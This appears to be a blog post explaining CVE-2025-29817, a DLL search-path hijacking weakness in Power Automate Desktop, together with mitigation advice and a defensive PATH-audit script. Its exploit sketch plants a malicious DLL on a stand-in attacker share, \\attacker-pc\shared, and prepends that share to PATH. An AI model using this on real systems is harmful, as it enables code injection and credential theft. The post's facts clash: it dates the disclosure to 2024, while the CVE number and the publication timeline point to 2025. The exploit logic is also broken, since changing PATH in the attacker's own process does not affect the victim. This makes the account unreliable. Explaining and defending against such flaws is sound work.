On June 7, 2024, Microsoft disclosed a security bug tracked as CVE-2025-29817, an “Uncontrolled Search Path Element” weakness in the Power Automate desktop application. This vulnerability allows an attacker with authorized access to leak sensitive information across a network, posing a real threat to business workflows.
Below, we break down what this vulnerability is, show you how it can be exploited, and what you can do to stay secure.
What is CVE-2025-29817?
This CVE refers to a weakness in how Power Automate handles paths to system resources. Basically, when Power Automate runs a process, it may search for libraries or tools using a path that can be controlled (directly or indirectly) by an attacker.
When a program relies on directories or paths set in environment variables (like PATH), and these can be overwritten or influenced by an attacker, it becomes possible to load malicious files instead of the expected system ones. This is what's meant by “Uncontrolled Search Path Element.”
Why is this a Big Deal?
- Information Exposure: An attacker can plant files in a known location, and if Power Automate looks in the wrong place first, it may load those fake files. This can leak credentials, environment data, or even let an attacker execute further code.
- Network Attack Vector: The attack works over a network if an attacker can influence a network share or mapped path.
- Minimal Privileges Required: The attacker only needs the same level of access as someone running Power Automate.
How It Might Be Exploited
Suppose you have a legitimate Power Automate flow that loads a DLL (Dynamic Link Library). Power Automate might search in the current directory or other paths defined by the PATH environment variable before searching secure system folders.
If an attacker can create a fake DLL with the same name in one of these paths, the application may load the malicious DLL. Here’s a simplified exploitation example:
```python
import os

# Attacker prepares a malicious DLL (payload bytes elided in the original)
malicious_dll = b'MZ...'  # Binary payload of malicious DLL

# The attacker copies the malicious DLL to a network share the victim can reach
network_share = r'\\attacker-pc\shared'
dll_name = 'vulnerable.dll'
with open(os.path.join(network_share, dll_name), 'wb') as f:
    f.write(malicious_dll)

# The attacker tricks Power Automate into searching this share first by
# prepending it to PATH
os.environ['PATH'] = network_share + ';' + os.environ['PATH']
# Now, when Power Automate launches or loads a component, it checks the
# attacker's share before the legitimate location
```
Result: Sensitive data (e.g., credentials, process information) could be intercepted and sent to the attacker's server.
Prevention and Mitigation
Microsoft has addressed this bug in new releases of Power Automate Desktop. Update your software as soon as possible. Additionally:
- Set strict permissions on directories in your search path.
More technical advice can be found in Microsoft’s advisory.
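Added example, not code from the original post or from Microsoft: a small Python audit of a Windows-style PATH value that flags the entries an uncontrolled search path can abuse (a UNC share like the one prepended in the sketch above, the current directory, relative entries and, optionally, directories the current user can write to) and builds a hardened value without them. SAMPLE_PATH is a constructed value, and the function names are this example's own.

```python
import os
import ntpath
from typing import Dict, List

# Constructed sample PATH value (not from the advisory); the first entry is the
# network share the exploit sketch above prepends.
SAMPLE_PATH = r'\\attacker-pc\shared;C:\Windows\System32;.;C:\Tools;;Tools\bin'


def audit_search_path(path_value: str, check_writable: bool = False) -> Dict[str, List[str]]:
    """Map each risky entry of a Windows-style (';'-separated) PATH to its reasons.

    Flagged: empty or '.' entries (the working directory gets searched), UNC
    entries (whoever controls the share controls what is loaded), relative
    entries (resolved against whatever the working directory happens to be),
    and, when check_writable is set, existing directories the current user can
    write to. The separator is hard-coded so the audit also runs off-Windows.
    """
    findings: Dict[str, List[str]] = {}
    for raw in path_value.split(';'):
        entry = raw.strip().strip('"')
        reasons = []
        if entry in ('', '.'):
            reasons.append('current working directory is searched')
        elif entry.startswith('\\\\') or entry.startswith('//'):
            reasons.append('UNC path: contents controlled by the share owner')
        elif not ntpath.isabs(entry):
            reasons.append('relative path resolved against the working directory')
        if check_writable and entry and os.path.isdir(entry) and os.access(entry, os.W_OK):
            reasons.append('writable by the current user')
        if reasons:
            findings[raw] = reasons
    return findings


def harden_search_path(path_value: str) -> str:
    """Return path_value with every flagged entry dropped, order preserved."""
    flagged = audit_search_path(path_value)
    return ';'.join(e for e in path_value.split(';') if e not in flagged)


if __name__ == '__main__':
    for entry, reasons in audit_search_path(SAMPLE_PATH).items():
        print(f'{entry!r}: {"; ".join(reasons)}')
    print('hardened:', harden_search_path(SAMPLE_PATH))
```

Run it against the PATH of the account that actually runs Power Automate (with check_writable=True on the Windows host itself); it covers only the PATH variable, and the application directory and working directory rank ahead of PATH in the DLL search order, so the vendor update remains the real fix.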
References
- Microsoft Security Response Center Advisory for CVE-2025-29817
- MITRE’s CVE Record for CVE-2025-29817
- OWASP: Uncontrolled Search Path Element
Conclusion
CVE-2025-29817 is a serious reminder to always validate your software configurations and trust boundaries. If you or your business uses Power Automate Desktop, don’t wait—patch right away and review your environment paths regularly!
If you want more details or help on remediation, drop your questions below or head to the official Microsoft update guide. Stay safe!
Timeline
Published on: 04/15/2025 17:15:48 UTC
Last modified on: 04/16/2025 00:41:34 UTC